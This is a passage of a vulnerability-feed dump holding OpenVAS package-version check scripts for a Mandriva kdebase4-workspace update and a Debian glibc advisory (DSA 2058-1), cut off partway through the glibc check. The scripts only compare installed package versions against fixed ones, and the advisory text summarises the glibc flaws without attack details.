rpm:\"plasma-applet-webbrowser~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-krunner-powerdevil\", rpm:\"plasma-krunner-powerdevil~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-runner-places\", rpm:\"plasma-runner-places~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"policykit-kde\", rpm:\"policykit-kde~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdecorations4\", rpm:\"lib64kdecorations4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kephal4\", rpm:\"lib64kephal4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kfontinst4\", rpm:\"lib64kfontinst4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kfontinstui4\", rpm:\"lib64kfontinstui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64khotkeysprivate4\", rpm:\"lib64khotkeysprivate4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kscreensaver5\", rpm:\"lib64kscreensaver5~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ksgrd4\", rpm:\"lib64ksgrd4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kwineffects1\", rpm:\"lib64kwineffects1~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kwinnvidiahack4\", rpm:\"lib64kwinnvidiahack4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kworkspace4\", rpm:\"lib64kworkspace4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64lsofui4\", rpm:\"lib64lsofui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nepomukquery4\", rpm:\"lib64nepomukquery4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nepomukqueryclient4\", rpm:\"lib64nepomukqueryclient4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64plasma_applet_system_monitor4\", rpm:\"lib64plasma_applet_system_monitor4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64plasmaclock4\", rpm:\"lib64plasmaclock4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64plasma-geolocation-interface4\", rpm:\"lib64plasma-geolocation-interface4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64polkitkdeprivate4\", rpm:\"lib64polkitkdeprivate4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64processcore4\", rpm:\"lib64processcore4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64processui4\", rpm:\"lib64processui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64solidcontrol4\", rpm:\"lib64solidcontrol4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64solidcontrolifaces4\", rpm:\"lib64solidcontrolifaces4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64taskmanager4\", rpm:\"lib64taskmanager4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64time_solar4\", rpm:\"lib64time_solar4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64weather_ion4\", rpm:\"lib64weather_ion4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-20T13:18:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880"], "description": "Check for the Version of kdebase4-workspace", "modified": "2017-12-19T00:00:00", "published": "2010-04-06T00:00:00", "id": "OPENVAS:830967", "href": "http://plugins.openvas.org/nasl.php?oid=830967", "type": "openvas", "title": "Mandriva Update for kdebase4-workspace MDVA-2010:112 (kdebase4-workspace)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for kdebase4-workspace MDVA-2010:112 (kdebase4-workspace)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kdebase4-workspace on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_insight = \"In mandriva 2010.0 /etc/pam.d/kde was not tagged as a config file so\n was replaced by a new file on each update.This update fixes this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-03/msg00046.php\");\n script_id(830967);\n script_version(\"$Revision: 8164 $\");\n script_cve_id(\"CVE-2009-4880\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-06 08:56:44 +0200 (Tue, 06 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVA\", value: \"2010:112\");\n script_name(\"Mandriva Update for kdebase4-workspace MDVA-2010:112 (kdebase4-workspace)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kdebase4-workspace\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdebase4-workspace\", rpm:\"kdebase4-workspace~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase4-workspace-devel\", rpm:\"kdebase4-workspace-devel~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdm\", rpm:\"kdm~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdecorations4\", rpm:\"libkdecorations4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkephal4\", rpm:\"libkephal4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkfontinst4\", rpm:\"libkfontinst4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkfontinstui4\", rpm:\"libkfontinstui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkhotkeysprivate4\", rpm:\"libkhotkeysprivate4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkscreensaver5\", rpm:\"libkscreensaver5~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libksgrd4\", rpm:\"libksgrd4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkwineffects1\", rpm:\"libkwineffects1~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkwinnvidiahack4\", rpm:\"libkwinnvidiahack4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkworkspace4\", rpm:\"libkworkspace4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"liblsofui4\", rpm:\"liblsofui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnepomukquery4\", rpm:\"libnepomukquery4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnepomukqueryclient4\", rpm:\"libnepomukqueryclient4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libplasma_applet_system_monitor4\", rpm:\"libplasma_applet_system_monitor4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libplasmaclock4\", rpm:\"libplasmaclock4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libplasma-geolocation-interface4\", rpm:\"libplasma-geolocation-interface4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpolkitkdeprivate4\", rpm:\"libpolkitkdeprivate4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libprocesscore4\", rpm:\"libprocesscore4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libprocessui4\", rpm:\"libprocessui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsolidcontrol4\", rpm:\"libsolidcontrol4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsolidcontrolifaces4\", rpm:\"libsolidcontrolifaces4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtaskmanager4\", rpm:\"libtaskmanager4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtime_solar4\", rpm:\"libtime_solar4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libweather_ion4\", rpm:\"libweather_ion4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-battery\", rpm:\"plasma-applet-battery~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-calendar\", rpm:\"plasma-applet-calendar~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-quicklaunch\", rpm:\"plasma-applet-quicklaunch~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-cpu\", rpm:\"plasma-applet-system-monitor-cpu~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-hdd\", rpm:\"plasma-applet-system-monitor-hdd~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-hwinfo\", rpm:\"plasma-applet-system-monitor-hwinfo~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-net\", rpm:\"plasma-applet-system-monitor-net~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-system-monitor-temperature\", rpm:\"plasma-applet-system-monitor-temperature~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-applet-webbrowser\", rpm:\"plasma-applet-webbrowser~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-krunner-powerdevil\", rpm:\"plasma-krunner-powerdevil~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"plasma-runner-places\", rpm:\"plasma-runner-places~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"policykit-kde\", rpm:\"policykit-kde~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdecorations4\", rpm:\"lib64kdecorations4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kephal4\", rpm:\"lib64kephal4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kfontinst4\", rpm:\"lib64kfontinst4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kfontinstui4\", rpm:\"lib64kfontinstui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64khotkeysprivate4\", rpm:\"lib64khotkeysprivate4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kscreensaver5\", rpm:\"lib64kscreensaver5~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64ksgrd4\", rpm:\"lib64ksgrd4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kwineffects1\", rpm:\"lib64kwineffects1~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kwinnvidiahack4\", rpm:\"lib64kwinnvidiahack4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kworkspace4\", rpm:\"lib64kworkspace4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64lsofui4\", rpm:\"lib64lsofui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nepomukquery4\", rpm:\"lib64nepomukquery4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nepomukqueryclient4\", rpm:\"lib64nepomukqueryclient4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64plasma_applet_system_monitor4\", rpm:\"lib64plasma_applet_system_monitor4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64plasmaclock4\", rpm:\"lib64plasmaclock4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64plasma-geolocation-interface4\", rpm:\"lib64plasma-geolocation-interface4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64polkitkdeprivate4\", rpm:\"lib64polkitkdeprivate4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64processcore4\", rpm:\"lib64processcore4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64processui4\", rpm:\"lib64processui4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64solidcontrol4\", rpm:\"lib64solidcontrol4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64solidcontrolifaces4\", rpm:\"lib64solidcontrolifaces4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64taskmanager4\", rpm:\"lib64taskmanager4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64time_solar4\", rpm:\"lib64time_solar4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64weather_ion4\", rpm:\"lib64weather_ion4~4.3.5~0.10mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "description": "The remote host is missing an update to glibc, eglibc\nannounced via advisory DSA 2058-1.", "modified": "2017-07-07T00:00:00", "published": "2010-06-10T00:00:00", "id": "OPENVAS:67542", "href": "http://plugins.openvas.org/nasl.php?oid=67542", "type": "openvas", "title": "Debian Security Advisory DSA 2058-1 (glibc, eglibc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2058_1.nasl 6614 2017-07-07 12:09:12Z cfischer $\n# Description: Auto-generated from advisory DSA 2058-1 (glibc, eglibc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the GNU C Library (aka\nglibc) and its derivatives. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\n\nCVE-2008-1391, CVE-2009-4880, CVE-2009-4881\n\nMaksymilian Arciemowicz discovered that the GNU C library did not\ncorrectly handle integer overflows in the strfmon family of\nfunctions. If a user or automated system were tricked into\nprocessing a specially crafted format string, a remote attacker\ncould crash applications, leading to a denial of service.\n\n\nCVE-2010-0296\n\nJeff Layton and Dan Rosenberg discovered that the GNU C library did\nnot correctly handle newlines in the mntent family of functions. If\na local attacker were able to inject newlines into a mount entry\nthrough other vulnerable mount helpers, they could disrupt the\nsystem or possibly gain root privileges.\n\n\nCVE-2010-0830\n\nDan Rosenberg discovered that the GNU C library did not correctly\nvalidate certain ELF program headers. If a user or automated system\nwere tricked into verifying a specially crafted ELF program, a\nremote attacker could execute arbitrary code with user privileges.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.7-18lenny4 of the glibc package.\n\nFor the testing distribution (squeeze), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems has been fixed in\nversion 2.1.11-1 of the eglibc package.\n\nWe recommend that you upgrade your glibc or eglibc packages.\";\ntag_summary = \"The remote host is missing an update to glibc, eglibc\nannounced via advisory DSA 2058-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202058-1\";\n\n\nif(description)\n{\n script_id(67542);\n script_version(\"$Revision: 6614 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:12 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-10 21:49:43 +0200 (Thu, 10 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2008-1391\", \"CVE-2009-4880\", \"CVE-2009-4881\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_name(\"Debian Security Advisory DSA 2058-1 (glibc, eglibc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"glibc-source\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.7-18lenny4\", rls:\"DEB5.0\")) != NULL) {\n 